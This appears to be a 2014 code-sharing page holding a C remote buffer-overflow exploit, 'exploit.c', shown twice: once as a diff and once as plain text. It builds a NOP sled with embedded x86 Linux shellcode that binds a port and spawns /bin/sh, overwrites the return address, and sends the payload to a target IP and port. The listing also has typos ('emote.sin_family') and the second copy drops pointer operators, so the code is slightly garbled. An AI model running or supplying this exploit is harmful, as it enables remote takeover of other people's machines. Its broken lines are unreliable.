kala13x · December 28, 2014 15:58
diff --git a/exploit.c b/exploit.c
 #include <stdio.h>
 #include <netdb.h>
 #include <netinet/in.h>

 char shellcode[] =
 "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
 "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
 "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
 "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
 "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
 "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
 "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
 "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

 #define RET 0xbffff5ec

 int main(int argc, char *argv[]) 
 {
 	char buffer[1064];
 	int s, i, size;
 	struct sockaddr_in remote;
 	struct hostent *host;
 	if(argc != 3) {
 		printf("Usage: %s target-ip port\n", argv[0]);
 		return -1;
 	}

 	memset(buffer, 0x90, 1064);
 	memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));
 	buffer[1000] = 0x90;

 	for(i=1022; i < 1059; i+=4) {
 		* ((int *) &buffer[i]) = RET;
 	}

 	buffer[1063] = 0x0;
 	host=gethostbyname(argv[1]);

 	if (host==NULL)
 	{
 		fprintf(stderr, "Unknown Host %s\n",argv[1]);
 		return -1;
 	}

 	s = socket(AF_INET, SOCK_STREAM, 0);

 	if (s < 0)
 	{
 		fprintf(stderr, "Error: Socket\n");
 		return -1;
 	}

 	emote.sin_family = AF_INET;
 	remote.sin_addr = *((struct in_addr *)host->h_addr);
 	remote.sin_port = htons(atoi(argv[2]));

 	if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
 	{
 		close(s);
 		fprintf(stderr, "Error: connect\n");
 		return -1;
 	}

 	size = send(s, buffer, sizeof(buffer), 0);

 	if (size==-1)
 	{
 		close(s);
 		fprintf(stderr, "sending data failed\n");
 		return -1;
 	}
 	close(s);
 }
	#include <stdio.h>
	#include <netdb.h>
	#include <netinet/in.h>

	char shellcode[] =
	"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
	"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
	"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
	"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
	"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
	"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
	"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
	"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";

	#define RET 0xbffff5ec

	int main(int argc, char *argv[])
	{
	char buffer[1064];
	int s, i, size;
	struct sockaddr_in remote;
	struct hostent *host;
	if(argc != 3) {
	printf("Usage: %s target-ip port\n", argv[0]);
	return -1;
	}

	memset(buffer, 0x90, 1064);
	memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode));
	buffer[1000] = 0x90;

	for(i=1022; i < 1059; i+=4) {
	* ((int *) &buffer[i]) = RET;
	}

	buffer[1063] = 0x0;
	host=gethostbyname(argv[1]);

	if (host==NULL)
	{
	fprintf(stderr, "Unknown Host %s\n",argv[1]);
	return -1;
	}

	s = socket(AF_INET, SOCK_STREAM, 0);

	if (s < 0)
	{
	fprintf(stderr, "Error: Socket\n");
	return -1;
	}

	emote.sin_family = AF_INET;
	remote.sin_addr = ((struct in_addr )host->h_addr);
	remote.sin_port = htons(atoi(argv[2]));

	if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1)
	{
	close(s);
	fprintf(stderr, "Error: connect\n");
	return -1;
	}

	size = send(s, buffer, sizeof(buffer), 0);

	if (size==-1)
	{
	close(s);
	fprintf(stderr, "sending data failed\n");
	return -1;
	}
	close(s);
	}